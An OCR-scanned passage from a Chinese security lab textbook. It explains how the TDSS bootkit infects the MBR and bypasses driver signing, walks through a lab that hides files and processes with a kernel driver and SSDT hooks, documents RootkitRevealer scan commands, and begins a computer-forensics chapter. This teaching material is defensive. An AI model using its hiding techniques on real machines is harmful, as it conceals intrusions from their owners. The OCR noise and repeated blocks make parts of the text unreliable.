原 系统 的 所 有 软件 和 驱动 皆 不 运行 ,这 样 就 可 以 清除 Rootkit 了 。 

避免 感染 Rootkit, 防 患 于 :最 好 的 安全 理念 。Rootkit 必须 拥有 管理 员 权 限 才能 
安装 ,进而 干扰 或 从 底层 控制 操作 系统 的 正常 运行 ,因此 日 常 操作 计算 机 时 使 用 一 个 拥有 少 
量 权 限 的 受 限 用 户 来 登录 .有 时 虽 不 方便 但 安全 性 可 以 得 到 很 好 的 保障 ,这 也 适用 于 防范 其 
他 恶意 软件 。 

另外 ProcessGuard 拥有 强大 的 防卫 功能 。 例 如 : 保护 物理 内 存 ; 拦截 全 局 钓 子 ; 拦截 

Rootkit/ 驱 动 /服务 安装 ; 拦截 注册 表 DLL 注入 ,能够 保护 Windows 进程 免 受 其 他 进程 、 服 
务 、 驱 动 程序 以 及 系统 上 的 其 他 形式 的 可 执行 代码 的 攻击 ; 还 能 够 停止 未 被 用 户 许可 的 程 
序 运行 ,停止 在 后 台 静 静 运行 的 恶意 蠕 虫 和 木马 等 攻击 ,甚至 可 以 停止 击 键 记录 程序 和 
leaktest; 阻止 安装 全 局 性 钧 子 及 进程 的 注入 ,可 以 避免 多 数 Rootkit 的 入 侵 。 
,“ 道 高 一 尺 , 魔 高 一 丈 ”,Rootkit 的 清除 不 能 只 依赖 一 种 方法 或 工具 。 

5) Bootkit 简介 

Rootkit 高 效 地 获取 系统 准 入 使 得 安全 领域 的 检测 技术 受到 极 大 的 挑战 。 为 防止 内 核 
模式 的 恶意 软件 以 及 数字 权限 管理 (DRM) 的 侵犯 ,微软 在 其 Vista 操作 系统 及 其 后 续 版 本 
中 增加 了 安全 策略 ,在 其 设备 驱动 中 要 求 数字 签名 。 这 一 安全 机 制 ,一 方面 增强 了 系统 安 
全 ,而 另 一 方面 也 防止 了 合法 的 第 三 方 应 用 软件 开发 商 驱动 程序 。 而 Bootkit 的 出 现 已 攻 
破 Windows 的 设备 驱动 签名 请 求 。 

Bootkit 主要 利用 其 内 核准 入 和 开机 过 程 的 隐身 技术 ,在 功能 上 并 无 异 于 Rootkits € 
们 的 不 同 主要 表现 在 获取 准 入 的 方式 上 。 传 统 的 Rootkit 利用 系统 启动 时 提升 权限 。 而 
Bootkit 是 被 安置 在 外 设 的 主 引 导 扇 区 和 驻 留 在 整个 系统 的 启动 过 程 中 。 

Bootkit 病毒 是 指 寄存 于 磁盘 主 引导 区 ,通过 系统 启动 来 进行 提 权 的 病毒 。 磁 盘 的 主 引 
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导 区 (MBR) 是 指 计算 机 中 被 设 为 启动 磁盘 的 第 一 个 扇 区 ,其 中 存放 着 由 BIOS( 标 准 输 入 输 
出 服务 ,完成 基本 的 系统 硬件 的 初始 化 ,并 为 操作 系统 提供 基本 硬件 访问 接口 ) 初 始 化 后 的 
将 要 被 加 载 到 内 存 的 代码 和 硬盘 的 分 区 信息 , 通 
常 这 段 代 码 运 行 后 会 存储 在 硬盘 上 。 图 15-8 所 
示 为 一 个 MBR 被 修改 的 截图 。 


[-lYour Corputer is ir 


Eee Pater, L P your 05. 图 15-8 中 计算 机 上 电 后 读 取 伪 MBR, 则 显 
示 上 述 信息 并 等 待 , 按 回 车 键 后 将 控制 权 交 还 给 
原始 的 MBR ,系统 正常 启动 。 


图 15-8 修改 MBR 


中 了 感染 引导 区 病毒 的 计算 机 不 会 因 更 新 操作 系统 而 消失 ,反而 新 安装 的 系统 会 再 次 
被 重新 感染 。 故 称 为 * 鬼 影 * 及 “ 魔 影 病毒。 下 面 以 “ 魔 影 ”为 例 介绍 Bootkit 的 机 理 。“ 魔 
影 ?TDSS 组 成 部 分 包括 bckfg. tmp, cfg. ini, cmd. dll, cmd64. dll, drv32、 drv64、 ldr16, 
ldr32、ldr64 和 mbr, 如 图 15-9 所 示 。 这 些 文件 加 密 存放 于 磁盘 末尾 的 一 个 空间 中 ,独立 于 
Windows 的 文件 系统 ,病毒 自己 实现 文件 系统 来 解析 和 读 写 这 些 文件 。TDSS 不 仅 可 以 感 
Ye 32 位 系统 ,还 可 以 感染 64 位 系统 。 


(1) 病毒 母体 运行 后 会 释放 一 个 随机 数 命名 的 
tmp 文件 , 它 实 际 上 是 一 个 驱动 ,利用 打印 管理 库 函 数 用户 的 文件 系统 HF 
winspool. drv 让 自己 加 载 起 来 ,取得 处 理 磁盘 请 求 的 最 文件 
底层 设备 ,获取 磁盘 容量 , 写 人 MBR, 建 立 起 自己 的 文 | —x e 
件 系统 。 病毒 的 文件 系统 方向 
(2) 重启 计算 机 时 ,病毒 开始 进一步 加 载 ,病毒 写 s 
入 的 MBR 中 包含 ldr16 ,会 搜索 将 其 加 载 至 内 存 , 然 后 larto, 
转交 控制 权 。 sh 
(3) ldrl6 加 载 后 挂钩 BIOS 的 INT 13H 中 断 , 获 ae 系统 
得 保护 模式 下 的 执行 权 , 根 据 系统 位 数 (32 位 或 64 位 ) cmddl 


寻找 ldr32 或 ldr64, 在 内 存 中 替换 原始 的 系统 文件 
kdcom. dll 并 加 载 。 除 此 之 外 ,1dr16 $ FE A 
BCD(Boot Configuration Data, 引 导 配 置 数 据 ) ,进而 绕 过 Windows 系统 的 核心 驱动 签名 验 
证 策略 ,有 效 地 避免 了 系统 的 自身 检查 ,达到 成 功 加 载 的 目的 。 

(4) 调用 KdDebuggerInitializel 函数 ,帮助 Rootkit 完成 初始 化 。 根 据 系统 位 数 (32 位 
或 64 位) 搜索 drv32 或 drv64, 读 取 该 驱动 并 加 载 到 内 存 , 设 置 挂钩 ,劫持 DISK 下 层 设 备 ， 
隐藏 自身 数据 ,启动 监视 进程 ,反复 感染 MBR ,达到 自我 保护 的 目的 。 

(5) 根据 cfg. ini 配置 文件 ,将 cmd. dll 代码 注入 指定 进程 ,这 是 TDSS 的 最 终 目的 。 

TDSS 的 加 载 流程 如 图 15-10 所 示 。 

对 于 Bootkit, 一 旦 它 获得 执行 机 会 ,会 比 操作 系 统 更 早 被 加 载 , 从 而 对 杀毒 软件 后 续 的 
有 效 查 杀 造 成 很 大 的 挑战 .有 时 这 种 挑战 甚至 是 强 弱 悬殊 的 。 然 而 ,如 果 把 Bootkit 加 载 的 
完整 流程 进行 综合 考虑 , 则 在 其 获得 执行 机 会 之 前 ,杀毒 软件 仍然 有 不 少 的 机 会 将 其 扼杀 于 
摇篮 之 中 ,这 是 建立 在 一 个 前 提 , 即 杀毒 软件 永远 比 病毒 先 被 安装 到 系统 里 。 因 此 ,要 对 付 
Bootkit ,不 应 该 单纯 从 Bootkit 被 执行 后 的 行为 着 眼 ,而 应 该 以 全 局 的 观念 ,从 源头 到 结果 
各 个 环节 综合 把 关 ,也 就 是 提高 安全 软件 的 全 程 综 合 监控 能 力 , 一 旦 在 这 个 过 程 中 Bootkit 
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程序 (或 安装 Bootkit 的 原始 病毒 体 ) 的 行为 被 病毒 软件 有 效 拦截 ,那么 杀毒 软件 仍然 可 以 
与 之 一 战 。 


5. 实践 操作 及 步骤 


1) 文件 和 进程 隐藏 

实践 中 用 到 两 个 文件 : HideDriverGUI. exe 和 HideDriver. sys。 

HideDriverGUI. exe; 用 户 级 RING3 应 用 程序 ,运行 在 管理 员 组 账户 下 ,用 于 加 载 和 启 
动 内 核 驱 动 程序 HideDriver. sys, 并 与 内 核 驱 动 进行 通信 ,通知 HideDriver. sys 隐藏 或 显示 
某 个 文件 或 某 个 进程 ,哪个 账户 拥有 或 不 能 拥有 文件 或 进程 的 访问 权限 。 

HideDriver. sys: 内 核 级 RING0 内 核 程序 ,接受 来 自 RING3 应 用 程序 HideDriverGUL exe 
的 命令 并 执行 ,如 果 需 要 可 以 将 执行 结果 返回 给 应 用 程序 。 

首先 启动 HideDriverGUI. exe, 其 界面 如 图 15-11 所 示 。 

在 图 15-11 中 ,Install 选项 卡 中 的 Driver Path 是 被 加 载 驱动 的 路 径 ,Driver Name 是 驱 
动 的 内 部 名 称 (不 必 和 文 件 名 相同 )。 图 15-12 所 示 为 WinHex. exe 搜索 HideDriver” 字 符 
串 的 截图 ,在 源 代 码 中 明文 存放 着 HideDriver 名 称 。 

图 15-11 中 的 StartUp type: SERVICE_BOOT_START=0; SERVICE_SYSTEM _ 
START= 1; SERVICE _AUTO _ START = 2; SERVICE _DEMAND _ START = 3; 
SERVICE_DISABLED 一 4。 解 释 见 实践 6. 

单 击 Install 按钮 安装 驱动 服务 ,会 在 注册 表 中 增加 该 服务 的 项 值 (如 前 文中 的 图 6-8 所 
示 ) ,然后 单 击 Run 按钮 加 载 启动 该 驱动 ,杀毒 软件 会 拦截 驱动 加 载 动 作 如 图 15-5 所 示 。 启 
动 成 功 后 ,Status 显示 Started 状态 ,图 15-2 显示 HideDriver. sys 安装 的 两 个 SSDT 钩子 。 
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图 15-12 WinHex 打开 HideDriver. sys 文件 


按钮 Stop AFARI Uninstall 用 于 删除 注册 表 中 服务 的 项 值 。 

HideDriver. sys 驱动 启动 后 ,打开 如 图 15-11 中 所 示 的 Files 选项 卡 , 如 图 15-13(a) 所 
示 , 右 击 列表 框 界面 ,选择 右键 菜单 Add 命令 ,弹出 如 图 15-13(b) 所 示 的 对 话 框 ,加 入 要 隐 
藏 的 文件 ,并 可 以 设置 该 隐藏 文件 对 哪个 进程 和 哪个 账户 是 可 见 (Access) 的 ,如 图 15-14 所 
示 。 设 置 完成 后 ,该 文件 从 资源 管理 器 中 消失 , 即 explorer. exe 无 法 访问 隐藏 文件 。 布 键 菜 
单 Delete 或 Delete All 用 于 清除 文件 的 隐藏 设置 。 
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如 图 15-11 中 所 示 的 Process 选项 卡 用 于 隐藏 进程 ,设置 方法 和 隐藏 文件 一 样 。 图 15-15 
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在 图 15-2 中 右 击 , 选 择 “ 恢 复 所 有 ”菜单 命令 , 则 可 以 清除 SSDT 钩子 ,这 样 被 隐藏 的 文 
件 或 进程 就 可 以 恢复 显示 了 。 

2) RootkitRevealer 的 使 用 

使 用 RootkitRevealer 之 前 ,最 好 先 用 优化 大 师 将 注册 表 清 理 一 下 ,免得 信息 太 多 反而 
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将 Rootkit 遗漏 了 。RootkitRevealer 内 包含 GUI 和 命令 行 两 个 版 本 ,其 中 命令 行 版 本 配合 
PsExec 可 以 执行 远程 扫描 。 首 先 要 注意 的 是 运行 RootkitRevealer 需要 Administrator 权 
限 。RootkitRevealer 支持 手工 扫描 和 自动 扫描 两 种 方式 。 

(1) 手工 扫描 。 

RootkitRevealer 使 用 比较 简单 ,直接 单 击 scan 按钮 就 可 以 扫描 系统 。RootkitRevealer 
提供 了 以 下 两 个 选项 。 

(D 隐藏 NTFS 中 的 元 数据 (Hide standard NTFS Metadata files) : 该 选项 是 默认 选择 的 ， 
默认 不 会 显示 NTFS 中 的 元 数据 (元 数据 是 存储 在 卷 上 支持 文件 系统 格式 管理 的 数据 。 它 
不 能 被 应 用 程序 访问 ,只 能 为 系统 提供 服务 ) 。 

© 扫描 注册 表 (Scan Registry): 该 选项 是 默认 选择 的 ,如 果 没 有 选择 ,将 略 过 注册 表 


扫描 。 


配合 


(2) 自动 扫描 。 
命令 行 的 RootkitRevealer 支持 多 种 选项 的 自动 扫描 ,使 用 方法 如 下 。 


rootkitrevealer [ -a [ —c] [ — m] [- r] outputfile] 


其 中 ， 

-a: 自动 扫描 ,扫描 完毕 后 程序 结束 。 
-c: 以 CSV 格式 输出 。 

-m: 显示 NTFS 中 的 元 数据 。 

-r: 略 过 注册 表 扫 描 。 

Outputfile: 扫描 存 入 文件 。 

例如 输入 命令 行 : 


rootkitrevealer -a -m D:\1. txt 


RootkitRevealer 支持 扫描 远程 主机 ,不 过 需要 与 Sysinternals 的 另外 一 个 工具 psexec 
使 用 ,命令 行 如 下 : 


psexec \\remote - c rootkitrealer. —ac:\windows\system32\rootkit. log 


RootkitRevealer 每 次 启动 后 会 产生 一 个 随机 的 文件 副本 启动 扫描 ,如 图 15-16 所 示 。 
区 x 


> 查看 消息 
2 稍 后 提醒 我 


O eg 


需要 注意 的 程序 或 设备 . 
程序 路 径 : C\UsersADMINI~1\AppData\Loca\Temp\WMFPCU.exe 
已 接收 : 2014 年 7 月 24 日 10:47:14 


当 程 序 与 Windows 不 完全 蒜 容 时 会 发 生 此 问 是 . 


15-16 RootkitRevealer 文件 副本 启动 扫描 


RootkitRevealer 会 进行 三 方面 的 扫描 : the Windows API,NTFS 主 文件 表 (the NTFS 


Master File Table (MFT)), NTFS 硬盘 目录 索引 (the NTFS on-disk directory index 
structures), 。 图 15-17 所 示 为 扫描 结果 的 截图 。 


对 Description 栏 的 注释 进行 解释 如 下 。 
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1601/1/1 800 
1601/1/1 800 Enor dumping hve: 
1601/171 8:00 Hidden from Windows API. 
2011711/241.. Hidden from Windows API. 
2014/7/22 0:43 Hidden from Windows API. 
2011/117241.. Hidden from Windows API, 
国 \sTwLogWsTops$T 201⁄11/241 Hidden from Windows API. 
[E CAE stendi SRmMetadatai$Aepair 2011711/241. Visible in directory index, but not Windows API or 
LDC MEAendASRmMetadata MET 2011/11/241.. Visible in directory index, but not Windows API or 
E CAExtend\SRmMetadataiSTafLog 2011711/241.. Visible in directory index, but not Windows API or 
CWExend\SRmMeladala\$T WLog\$Tops 2011/11/241.. Visible in directory index, but not Windows API or 
‘SExend\$RmMetadala\$T Log\$TLog bif 2014/7/22 203 I Visible in drectory index, but not Windows API or 
A$Extend\ SAmMetadata\$TxfLog\$TxiLogContainer00000000000.. 2013/3/22 20.. Visible in drectory index, but not Windows API or 
C\$Extend\$RmMetadata\$TxLog\$TLogContainer00000000000. 。 2014/7/22 203 Visible in directory index, but not Windows API or 
BC\Documents and Settings 2009/7/14 12... Hidden from Windows API. 
CADocuments and Settings [CAUsers] 2009/7/14 12. Visible in Windows API, but not in MFT or drector 
CADocuments and Selingsvasa 2014/777 2327 Visible in Windows API, but not in MFT or drector 
CADocuments and SettingstaaatAppD ata 2011/7/25 22. Visible in Windows API. but not in MFT or drector 
CADocuments and Selings\asa\AppDala\Local 2014/7/7 2329 Visible in Windows API. but not in MFT or drector 
CADocuments and Selings\aaa\AppData\Loca\Application Data [C... 2014/7/7 23:26 Visible in Windows API, but not in MFT or drector 
C\Documents and Seltings\aaa\AppDataiLocaħ Application Date... 2014/7/7 23.26 Visible in Windows API, but not in MFT or diector 
CADocuments and Selings\aaa\AppData\Local\Application DatahA.. 2014/7/7 23:26 Visible in Windows API, but not in MFT or drector 
CADocuments and SettingsasatAppData\Loca Application Data\A.. 2014/7/7 23:26 Visible in Windows API, but not in MFT or drector 
CADocuments and Selings\aaa\AppData\Loca\Application DatahA.. 2014/7/7 2326 Visible in Windows API. but not in MFT or drector 
C\Documents and Selings\aaa\AppDala\Local\Application Data\A.. 2014/7/7 2326 Visible in Windows API, but not in MFT or daector 
CADocumenis and SettingsVaaa AppD ata Local Appication DatabA.. 2014/7/7 23:26 Visible in Windows API, but not in MFT or =. 


yaq aa 
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z Hidden from Windows API. 

NTFS 文件 系统 会 隐藏 元 数据 文件 (metdata files, f#| il $ MFT/ $ Secure 等 ) 而 不 让 
Windows API (用 户 级 函数 FindTheFile 和 FindNextFile, 最 终 会 调用 系统 API: 
NtQueryDirectoryFile) 发 现 , 很 多 Rootkit 木马 采用 了 这 一 特点 来 隐藏 自己 的 文件 。 如 果 
没有 选择 Hide NTFS metadata files, 对 于 NTFS 元 文件 也 会 出 现 该 注释 。 

æ Access is Denied. 

RootkitRevealer 应 该 永远 不 会 出 现 该 提示 ,因为 RootkitRevealer 的 进程 可 以 访问 任 
何 文件 .目录 或 者 注册 表 键 值 。 所 以 出 现 这 条 注释 的 话 可 以 肯定 是 Rootkit, 

æ Visible in Windows API, directory index. but not in MFT. 

Visible in Windows API. but not in MFT or directory index. 
Visible in Windows API, MFT, but not in directory index. 
Visible in directory index. but not Windows API or MFT. 

正如 上 面 已 经 提 到 的 进行 一 次 扫描 会 扫描 3 个 组 件 : Windows API, NTFS 主 文件 表 
(the NTFS Master File Table (MFT)) 以 及 NTFS 硬盘 目录 索引 (the NTFS on-disk 
directory index structures)。 以 上 注释 说 明 该 文件 只 在 一 个 或 两 个 扫描 过 程 中 被 发 现 。 一 
个 比较 常见 的 原因 是 一 个 文件 在 扫描 过 程 中 被 创建 或 删除 。 

æ Windows API length not consistent with raw hive data. 

API 的 长 度 和 原始 单元 数据 记录 的 不 一 致 。Rootkit 能 够 尝试 通过 错 报 注 册 表 键 值 的 
大 小 来 实现 对 Windows API 的 隐藏 。 应 该 仔细 检查 。 
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CADocuments and Selingsvasa 2014/777 2327 Visible in Windows API, but not in MFT or drector 
CADocuments and SettingstaaatAppD ata 2011/7/25 22. Visible in Windows API. but not in MFT or drector 
CADocuments and Selings\asa\AppDala\Local 2014/7/7 2329 Visible in Windows API. but not in MFT or drector 
CADocuments and Selings\aaa\AppData\Loca\Application Data [C... 2014/7/7 23:26 Visible in Windows API, but not in MFT or drector 
C\Documents and Seltings\aaa\AppDataiLocaħ Application Date... 2014/7/7 23.26 Visible in Windows API, but not in MFT or diector 
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C\Documents and Selings\aaa\AppDala\Local\Application Data\A.. 2014/7/7 2326 Visible in Windows API, but not in MFT or daector 
CADocumenis and SettingsVaaa AppD ata Local Appication DatabA.. 2014/7/7 23:26 Visible in Windows API, but not in MFT or =. 
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z Hidden from Windows API. 

NTFS 文件 系统 会 隐藏 元 数据 文件 (metdata files, f#| il $ MFT/ $ Secure 等 ) 而 不 让 
Windows API (用 户 级 函数 FindTheFile 和 FindNextFile, 最 终 会 调用 系统 API: 
NtQueryDirectoryFile) 发 现 , 很 多 Rootkit 木马 采用 了 这 一 特点 来 隐藏 自己 的 文件 。 如 果 
没有 选择 Hide NTFS metadata files, 对 于 NTFS 元 文件 也 会 出 现 该 注释 。 

æ Access is Denied. 

RootkitRevealer 应 该 永远 不 会 出 现 该 提示 ,因为 RootkitRevealer 的 进程 可 以 访问 任 
何 文件 .目录 或 者 注册 表 键 值 。 所 以 出 现 这 条 注释 的 话 可 以 肯定 是 Rootkit, 

æ Visible in Windows API, directory index. but not in MFT. 

Visible in Windows API. but not in MFT or directory index. 
Visible in Windows API, MFT, but not in directory index. 
Visible in directory index. but not Windows API or MFT. 

正如 上 面 已 经 提 到 的 进行 一 次 扫描 会 扫描 3 个 组 件 : Windows API, NTFS 主 文件 表 
(the NTFS Master File Table (MFT)) 以 及 NTFS 硬盘 目录 索引 (the NTFS on-disk 
directory index structures)。 以 上 注释 说 明 该 文件 只 在 一 个 或 两 个 扫描 过 程 中 被 发 现 。 一 
个 比较 常见 的 原因 是 一 个 文件 在 扫描 过 程 中 被 创建 或 删除 。 

æ Windows API length not consistent with raw hive data. 

API 的 长 度 和 原始 单元 数据 记录 的 不 一 致 。Rootkit 能 够 尝试 通过 错 报 注 册 表 键 值 的 
大 小 来 实现 对 Windows API 的 隐藏 。 应 该 仔细 检查 。 
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æ Access is Denied. 

RootkitRevealer 应 该 永远 不 会 出 现 该 提示 ,因为 RootkitRevealer 的 进程 可 以 访问 任 
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æ Visible in Windows API, directory index. but not in MFT. 
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正如 上 面 已 经 提 到 的 进行 一 次 扫描 会 扫描 3 个 组 件 : Windows API, NTFS 主 文件 表 
(the NTFS Master File Table (MFT)) 以 及 NTFS 硬盘 目录 索引 (the NTFS on-disk 
directory index structures)。 以 上 注释 说 明 该 文件 只 在 一 个 或 两 个 扫描 过 程 中 被 发 现 。 一 
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æ Windows API length not consistent with raw hive data. 

API 的 长 度 和 原始 单元 数据 记录 的 不 一 致 。Rootkit 能 够 尝试 通过 错 报 注 册 表 键 值 的 
大 小 来 实现 对 Windows API 的 隐藏 。 应 该 仔细 检查 。 
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z Hidden from Windows API. 

NTFS 文件 系统 会 隐藏 元 数据 文件 (metdata files, f#| il $ MFT/ $ Secure 等 ) 而 不 让 
Windows API (用 户 级 函数 FindTheFile 和 FindNextFile, 最 终 会 调用 系统 API: 
NtQueryDirectoryFile) 发 现 , 很 多 Rootkit 木马 采用 了 这 一 特点 来 隐藏 自己 的 文件 。 如 果 
没有 选择 Hide NTFS metadata files, 对 于 NTFS 元 文件 也 会 出 现 该 注释 。 

æ Access is Denied. 

RootkitRevealer 应 该 永远 不 会 出 现 该 提示 ,因为 RootkitRevealer 的 进程 可 以 访问 任 
何 文件 .目录 或 者 注册 表 键 值 。 所 以 出 现 这 条 注释 的 话 可 以 肯定 是 Rootkit, 

æ Visible in Windows API, directory index. but not in MFT. 

Visible in Windows API. but not in MFT or directory index. 
Visible in Windows API, MFT, but not in directory index. 
Visible in directory index. but not Windows API or MFT. 

正如 上 面 已 经 提 到 的 进行 一 次 扫描 会 扫描 3 个 组 件 : Windows API, NTFS 主 文件 表 
(the NTFS Master File Table (MFT)) 以 及 NTFS 硬盘 目录 索引 (the NTFS on-disk 
directory index structures)。 以 上 注释 说 明 该 文件 只 在 一 个 或 两 个 扫描 过 程 中 被 发 现 。 一 
个 比较 常见 的 原因 是 一 个 文件 在 扫描 过 程 中 被 创建 或 删除 。 

æ Windows API length not consistent with raw hive data. 

API 的 长 度 和 原始 单元 数据 记录 的 不 一 致 。Rootkit 能 够 尝试 通过 错 报 注 册 表 键 值 的 
大 小 来 实现 对 Windows API 的 隐藏 。 应 该 仔细 检查 。 


æ Type mismatch between Windows API and raw hive data. 

API 类 型 不 匹配 。 注 册 表 的 值 是 有 类 型 的 ,如 DWORD/REG_SZ, 这 个 差异 说 明 通过 
Windows API 报告 的 键 值 类 型 和 原始 单元 数据 (raw hive data) 不 一 致 。 一 个 Rootkit 可 以 
通过 存储 为 REG_BINARY 类 型 来 掩饰 自己 的 数据 ,并 且 让 Windows API 相信 它 是 一 个 
REG_SZ 类 型 的 。 

æ Key name contains embedded nulls. 

键 名 包含 嵌入 的 空 字符 。Windows API 把 键 名 看 成 空 终止 字符 串 ( 以 “/0’ 结 尾 ) ,但 是 
系统 内 核 却 把 键 名 看 做 已 计数 字符 串 。 所 以 可 以 创建 一 些 对 操作 系统 可 见 , 但 对 部 分 注册 
表 工 具 如 Regedit 不 可 见 的 键 值 。 这 种 方式 常常 被 一 些 恶意 软件 和 Rootkit 采用 来 实现 隐 
藏 自己 ,可 以 用 Sysinternals RegDelNull tool 来 删除 包含 退 入 空 字符 的 键 。 

æ Data mismatch between Windows API and raw hive data. 

该 差异 会 在 注册 表 正 在 被 扫描 的 时 候 键 值 被 更 改 而 产生 。 应 该 仔细 检查 以 确保 是 一 个 
正当 的 程序 进行 的 更 改 。 

RootkitRevealer 的 扫描 结果 并 不 能 确定 一 定 是 木马 存在 ,需要 对 具体 的 文件 与 注册 表 
项 进行 检查 ,有 的 注册 表 键 被 Windows 系统 调用 而 不 断 更 新 (例如 产生 随机 数 ) ,可 能 会 被 
RootkitRevealer 扫 出 来 有 “Data mismatch between Windows API and raw hive data” 的 提 
示 , 但 这 并 不 是 木马 的 原因 。 所 以 RootkitRevealer 只 是 检测 工具 ,扫描 结果 是 供 大 家 参考 ， 
而 不 是 固定 的 结论 。 


6. 思考 题 
如 何 认识 Rootkit 的 预防 ,检测 、 清 除 的 过 程 是 动态 变化 的 ? 


| arum 


1. 实践 目的 
理解 和 掌握 恶意 代码 取证 和 分 析 的 方法 。 
2. 实践 环境 


(1) 连 入 Internet 的 计算 机 一 台 , 安 装 Windows XP 或 Windows 7 
等 操作 系统 。 
(2) 实践 工具 : 取证 软件 套件 。 


3. 名 词 解释 


(1) 计算 机 取证 : 计算 机 取证 (Computer Forensics, 计 算 机 取证 技 
术 / 计 算 机 鉴 识 /计算 机 法 医学 ) 是 指 运用 计算 机 辨析 技术 ,对 计算 机 犯 
罪行 为 进行 分 析 以 确认 罪犯 及 计算 机 证 据 , 并 据 此 提起 诉讼 。 也 就 是 针 
对 计算 机 入侵 与 犯罪 ,进行 证 据 获 取 、 保 存 . 分 析 和 出 示 。 

(2) 计算 机 证 据 : 在 计算 机 系统 运行 过 程 中 产生 用 以 证 明 案 件 事 实 
的 内 容 的 一 种 电磁 记录 物 。 


4. 预备 知识 


1) 计算 机 取证 的 发 展 

计算 机 技术 的 迅速 发 展 和 广泛 普及 ,改变 了 人 们 传统 的 生产 .生活 
和 管理 方式 ,同时 也 为 违法 犯罪 分 子 提供 了 新 的 犯罪 手段 和 作案 平台 。 
面 对 越 来 越 多 的 千奇百怪 的 高 科技 犯罪 案件 ,传统 取证 模式 已 不 能 完全 
满足 其 办 案 需 求 , 司 法 或 相关 取证 部 门 需要 运用 更 为 先进 的 计算 机 取证 
技术 (如 数据 恢复 技术 ) ,成 功 提取 存储 于 计算 机 系统 中 的 电子 证 据 ( 包 
括 已 被 删除 ,加密 或 被 破坏 的 文件 资料 等 )。 早 在 20 世纪 80 年 代 , 国 际 
上 就 已 经 开始 研究 与 开发 计算 机 取证 相关 理论 和 技术 了 。 

1984 年 ,美国 FBI 建 立 了 计算 机 分 析 与 响应 组 CART, 

1993 年 ,举行 了 第 一 届 计 算 机 证 据 的 国际 会 议 。 

1995 年 ,建立 计算 机 证 据 的 国际 组 织 IOCE(International Organization 


on Computer Evidence) 。 


1997 年 ,八国 集团 在 莫斯科 宣称 : 司法 部 门 的 职员 应 得 到 新 培训 、 新 装备 以 应 对 高 技 
术 犯 罪 。 

1998 年 ,八国 集团 指定 TOCE 组 织 建立 处 理 数字 证 据 的 国际 准则 。 

2000 年 ,美国 FBI 建立 了 正式 的 区 域 性 计算 机 取证 实践 室 。 

计算 机 取证 技术 概念 于 2001 年 进入 国内 ,从 入 侵 取证 反 黑 客 开 始 , 后 逐渐 成 形 。 我 国 
有 关 计 算 机 取证 的 研究 与 实践 尚 在 起 步 阶段 ,只 有 一 些 法 律 法 规 涉及 到 了 一 些 有 关 计 算 机 
证 据 的 说 明 , 如 (关于 审理 科技 纠纷 案件 的 若干 问题 的 规定 》《 计 算 机 软件 保护 条 例 》《 电 子 
签名 法 》。 国 内 计算 机 取证 学 术 活动 事件 主要 有 全 国 计 算 机 取证 技术 研讨 会 和 中 国 计 算 机 
取证 技术 峰会 。 在 美国 至 少 有 70% 的 法 律 部 门 拥有 自己 的 计算 机 取证 实践 室 , 而 我 国 则 仅 
有 不 到 30% 的 法 律 部 门将 计算 机 取证 技术 应 用 于 日 常 的 办 案 工 作 中 。 尽 管 如 此 ,我 国 对 计 
算 机 取证 技术 领域 的 追求 却 从 未 停止 ,数据 恢复 技术 已 经 在 司法 取证 领域 里 得 到 了 广泛 的 
应 用 ,为 我 国 司 法 取证 部 门 提供 了 有 力 的 相关 技术 支持 。 

2) 计算 机 取证 理论 

(1) 取证 目标 。 

运用 计算 机 及 其 相关 科学 和 技术 的 原理 与 方法 ,获取 与 计算 机 相关 的 证 据 , 以 证 明 某 个 
客观 事实 的 过 程 ,对 计算 机 证 据 的 确定 .收集 保护、 分 析 \ 归 档 以 及 法 庭 出 示 。 计 算 机 取证 
要 解决 的 问题 是 : Who、When、Where、How、What。 以 网 络 入 侵 为 例 ,计算 机 取证 需要 解 
决 以 下 几 个 问题 。 

O 攻击 者 什么 时 间 进入 系统 ,停留 了 多 长 时 间 ? 

@ 攻击 者 是 如 何 进入 系统 的 ? 

@ 攻击 者 做 了 些 什 么 ? 

@ 攻击 者 得 到 了 什么 信息 ? 

© 如 何 找到 、 并 证 明 攻击 者 是 现实 中 的 某 个 具体 行为 人 ? 

被 害 者 的 损失 情况 怎么 样 ? 

@ 攻击 者 的 行为 动机 是 什么 ? 

(2) 取证 的 重要 性 。 

除 调查 推理 ,发 现 线索 和 确定 证 据 ,还 有 其 他 用 途 。 

O 进一步 理解 案件 事实 以 及 它们 的 相关 性 。 

O 通过 揭示 重要 的 犯罪 情节 和 调查 成 果 来 进一步 关注 调查 工作 。 

© 查找 隐藏 的 证 据 。 

© 发 现 具有 犯罪 动机 、 手 段 和 机 会 的 嫌疑 犯 。 

© 把 嫌疑 犯 的 调查 区 分 优先 次 序 。 

建立 内 部 知情 人 员 和 入 侵 者 的 证 据 。 

O 预测 入 侵 者 的 行为 并 评估 其 扩张 的 潜力 。 

将 具有 相同 行为 印记 的 关联 犯罪 联系 起 来 。 

@ 洞察 罪犯 的 幻想 、 动 机 、 意 图 和 心态 。 

O 指导 审讯 嫌疑 犯 或 者 与 罪犯 联系 。 

D 在 法 庭 上 提交 诉 案 。 


实践 教程 


(3) 取证 的 基本 原则 。 

O 合法 性 原则 : 依照 法 定 程序 提取 证 据 。 

@ 及 时 性 原则 : 尽早 搜集 证 据 ,并 保证 其 没有 受到 破坏 。 

© 准确 性 原则 : 运用 科学 的 技术 ,获得 真实 结果 。 

@ 证 据 连 续 性 (证 据 保全 ): 建立 证 据 链 (Chain of custody) ,证 据 被 正式 提交 法 庭 时 ， 
必须 能 够 说 明证 据 从 最 初 获 取 状 态 到 法 庭 上 出 示 状 态 之 间 的 任何 变化 ,最 好 无 变化 。 

© 取证 过 程 必须 受到 监督 。 如 原告 委派 的 专家 所 做 的 所 有 调查 取证 过 程 最 好 受到 其 
他 方 委派 专家 的 监督 。 

多 备份 原则 : 对 于 包含 计算 机 证 据 的 媒体 至 少 应 该 制作 两 个 副本 ,原始 副本 一 般 不 
作为 证 据 提取 和 分 析 。 

D 环境 安全 原则 : 计算 机 证 据 应 妥善 保存 ,以 备 随时 重组 .试验 或 展示 。 

@ 严格 管理 过 程 原则 : 含 计算 机 证 据 的 媒体 的 移交 ,保管 .开封 . 拆 印 过 程 必须 由 侦查 
人 员 和 保管 人 员 共同 完成 ,每 个 环节 都 必须 检查 真实 性 和 完整 性 ,并 拍照 和 制作 详细 的 笔 
录 , 由 行为 人 共同 签名 。 

@ 取证 过 程 中 ,尊重 私人 信息 。 

(4) 计算 机 证 据 。 

计算 机 证 据 是 指 以 计算 机 形式 存在 的 ,用 作证 据 使 用 的 一 切 材料 及 其 派生 物 ,或 者 说 是 
